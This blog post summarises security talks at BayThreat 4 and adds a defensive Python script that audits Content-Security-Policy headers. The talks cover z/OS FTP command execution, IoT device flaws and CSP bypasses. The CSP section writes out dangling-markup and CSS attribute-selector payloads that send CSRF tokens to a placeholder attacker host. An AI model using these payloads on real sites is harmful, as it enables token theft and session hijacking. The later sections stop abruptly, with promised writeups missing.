The year is almost over, but the infosec community in the Bay Area shows no signs of slowing down, with the fourth annual BayThreat conference happening this Friday and Saturday. I have always loved smaller hacker cons for their much more personable feel and their few carefully selected talks, which you can see without missing a dozen others. I love BayThreat not only because it is a local event, but also because the overall quality of the talks and organization is on par with many of the larger cons.

    BayThreat 4 marks the return to the Hacker Dojo, albeit at a different location, which in my opinion is even better than the original. Below are a few writeups on the talks from the breaker track that I had a chance to attend.

    Hacking Mainframes Like a Boss

    If you ever wanted to "Hack the Gibson", or are just interested in attacking obscure yet highly sensitive targets, this talk was a real treat. George Sarbanes &0xBA115 Polivka and Phillip Soldier of Fortran gave an excellent presentation on z/OS mainframes and several exploits. Apparently z/OS FTP servers can be used to execute arbitrary commands by uploading a JCL file and issuing the SITE FILE=JES command. Check out MainTP and ftp_jcl_app.rb to test the code yourself.

    Phillip and George were nice enough to set up an emulated z/OS server for us to play with, but if you want to try out the exploits yourself, install the Hercules z/Architecture Emulator on your personal computer.

    The main message of the talk was to encourage security researchers to take a look at mainframe security. Because of their relative obscurity, a lot of vulnerability classes that were discovered and patched long ago in more mainstream systems are still waiting to be found on these aging giants.


    Effective Hardware Anti-Tamper by Realtime Verification of Physically Unclonable Functions - Or how to thwart the "Evil Maid"

    The presentation by Eric Michaud (Rift Recon) and Ryan Lackey (CryptoSeal, HavenCo, MetaColo and a few other ventures) introduced a novel methodology for visual detection of tampering with sensitive equipment such as a company laptop. Their concept works by photographing a laptop fitted with tamper-evident stickers before and after leaving the device unattended, the setting of the classic "Evil Maid" attack. By running computer vision algorithms on your smartphone, they made it possible to cheaply and effectively detect evidence of tampering.

    Naturally the approach is not foolproof, but considering just how cheap and easy it is to implement, I think the final app, called Verifier, should be a pretty effective additional layer of defense.

    Beyond the main presentation, I enjoyed the fun stories from the trenches, ranging from Air France bugging first class seats to using RF emanations to detect unlicensed software copies running in the room.


    Abusing the Internet of Things: Blackouts, Freakouts, and Stakeouts

    A fun talk about the lack of security in many Internet-enabled and remotely controlled home gadgets, all while getting a private tour of Nitesh Dhanjani's apartment =].

    The Philips Hue lighting system generates the username token used to authenticate to the wireless bridge by simply MD5-ing the MAC address of the authenticating device (an iPhone). Nitesh showed a video of an attack where he enumerated all of the connected devices on the network, obtained their MAC addresses and tried each derived token to perform an action on the bridge. Once the attack script found a registered device, it went into a loop issuing the lights-off command, causing a continuous blackout.

    The Belkin WeMo Baby Monitor allowed a connection from any smartphone running the WeMo app on the local network. After the initial connection to the baby monitor, the smartphone app obtained a unique identifier which could then be used to listen in to the monitor's audio stream from any point on the Internet. The Belkin WeMo Switch had the same issue as the baby monitor: connect once, connect from anywhere.

    The Belkin NetCam used a different infrastructure and required authentication over SSL. However, the NetCam apparently sent the login and password periodically to a third-party box on the Internet in clear text.


    So You Want to Build A Burp Plugin?

    An educational talk by Monika Morrow introducing the audience to Burp plugin development in Java. Monika covered the new set of Burp APIs and illustrated several complete plugins that modify traffic and enhance the Burp experience with additional context menus and notifications.


    Bypassing Content-Security-Policy

    A comprehensive talk by Alex kuza55 Kouzemtchenko on subverting CSP, with the sample goal of leaking CSRF tokens embedded in the body of the page. Several classes of bypasses were demonstrated in the presentation:

    Dangling markup injection involved the use of the classic img-src, form-action, button, option, font-src * and similar vectors to embed half-completed markup (e.g. <form action=''><textarea>) so that the rest of the page, including whatever hidden CSRF token it carries, would be submitted to the attacker's page.

    Abusing CSS3 selectors to extract CSRF token values character by character. This trick works by using a targeted attribute selector such as input[name=csrf_token][value^=a] and triggering the corresponding request to the attacker's site with background-image: url(http://attacker/log?^a).

    Abusing SVG files to leak page contents and do a lot more damage.

    Using user installed plugins such as Flash, Adobe Reader, etc. to abuse plugin specific functionality (e.g.

    Next, Alex went into a separate class of application-specific attacks using JSONP callbacks, browser-specific flaws, or simply abusing unsafe-eval in sites' own scripts.

    I found the attacks utilizing Content Delivery Networks like Akamai particularly interesting: a CDN that hosts vulnerable versions of scripts on the same shared domain as your site exposes your site regardless of which scripts you actually use, because whitelisting that domain whitelists all of them.

    Several slides were dedicated to various vulnerable JavaScript frameworks, with injections into JS-based template systems and abuse of framework-specific objects and functionality. A great deal of time was spent on the AngularJS framework: what it did right and what could still be improved.

    To finish off the presentation, Alex covered some of the browser mitigations for the above attack vectors and how to bypass them once more.
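    The bypass classes above map onto specific gaps in a policy, so here is a small policy audit, written for this writeup rather than taken from Alex's talk, that flags a CSP header for each of them: missing form-action (dangling-markup form submission), wildcard img-src/font-src (URL-based exfiltration), injectable styles (attribute-selector leakage), plugin content via object-src, and unsafe-eval. The two policy strings are constructed for illustration.

```python
from typing import Dict, List

# Fetch directives that inherit from default-src when absent; form-action
# does NOT fall back, which is exactly why forgetting it is dangerous.
FETCH_FALLBACK = ("img-src", "font-src", "style-src", "script-src", "object-src")

def parse_csp(header: str) -> Dict[str, List[str]]:
    """Split a CSP header into {directive: [source expressions]}."""
    policy: Dict[str, List[str]] = {}
    for chunk in header.split(";"):
        parts = chunk.strip().split()
        if parts:
            policy[parts[0].lower()] = parts[1:]
    return policy

def effective(policy: Dict[str, List[str]], directive: str) -> List[str]:
    """Return the source list that actually governs a fetch directive."""
    if directive in policy:
        return policy[directive]
    if directive in FETCH_FALLBACK:
        return policy.get("default-src", ["*"])  # no policy at all allows everything
    return []

def is_open(sources: List[str]) -> bool:
    """True if the source list admits arbitrary external hosts."""
    return any(s in ("*", "http:", "https:") for s in sources)

def audit_csp(header: str) -> List[str]:
    """One finding per bypass class described in the talk that the policy leaves open."""
    policy = parse_csp(header)
    findings: List[str] = []
    if "form-action" not in policy:
        findings.append("form-action missing: dangling <form> markup can submit page contents, CSRF token included, to any origin")
    for directive in ("img-src", "font-src"):
        if is_open(effective(policy, directive)):
            findings.append(f"{directive} allows any host: dangling markup can exfiltrate page text in a request URL")
    style = effective(policy, "style-src")
    if "'unsafe-inline'" in style or is_open(style):
        findings.append("style-src permits injected CSS: attribute selectors can leak a token value character by character")
    if effective(policy, "object-src") != ["'none'"]:
        findings.append("object-src is not 'none': Flash/Reader plugin content can still be loaded")
    if "'unsafe-eval'" in effective(policy, "script-src"):
        findings.append("script-src allows 'unsafe-eval': string-to-code sinks in the site's own scripts remain reachable")
    return findings

# Constructed sample policies: a typical permissive one and a locked-down one.
WEAK_POLICY = "default-src 'self'; img-src *; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-eval'"
HARDENED_POLICY = ("default-src 'none'; script-src 'self'; style-src 'self'; img-src 'self'; "
                   "font-src 'self'; object-src 'none'; form-action 'self'; base-uri 'self'")

if __name__ == "__main__":
    for name, policy in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        print(f"{name}: {len(audit_csp(policy))} finding(s)")
        for finding in audit_csp(policy):
            print("  -", finding)
```

    The check is deliberately structural: it cannot tell whether a whitelisted CDN also hosts JSONP endpoints or vulnerable library versions, which is the shared-domain problem Alex raised and has to be reviewed by hand.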

    Once the slides become available, I would highly recommend going over Alex's presentation with a fine-tooth comb as a comprehensive guide to the various injection and bypass attack vectors in modern browsers.


    Not bad for the first day; time to get some sleep and get ready for more excellent people and talks tomorrow.


    08 dec
    baythreat 4 - day two

    After a great day of hanging out with old and new friends, all while getting inspired to start breaking and researching anything from 50-year-old behemoths to Internet-enabled light bulbs, I raced down the Peninsula to the epicenter of the Bay Area's security community at Hacker Dojo. BayThreat Day Two had begun.

    In a terrible miscalculation of my sleeping schedule I regretfully missed several morning talks; however, below are the writeups of another series of excellent presentations from the breaker track for the remainder of the day.

    12 dec
    isec open forum bay area

    It feels like the infosec community in the Bay Area is just getting warmed up toward the end of the year, with another quarterly iSEC Open Forum. As a small, local security event, it usually hosts novel security topics from local security professionals that may not appear at more mainstream events. After getting to the talks area at the end of a long hall, with folks from Dropbox zooming by on their skateboards and razorblades, I found an infosec crowd of about a hundred or so people ready to learn and connect.

    Below are my notes from the event.


    All original content on this site is copyright protected and licensed under Creative Commons - Attribution, NonCommercial, ShareAlike 4.0 International.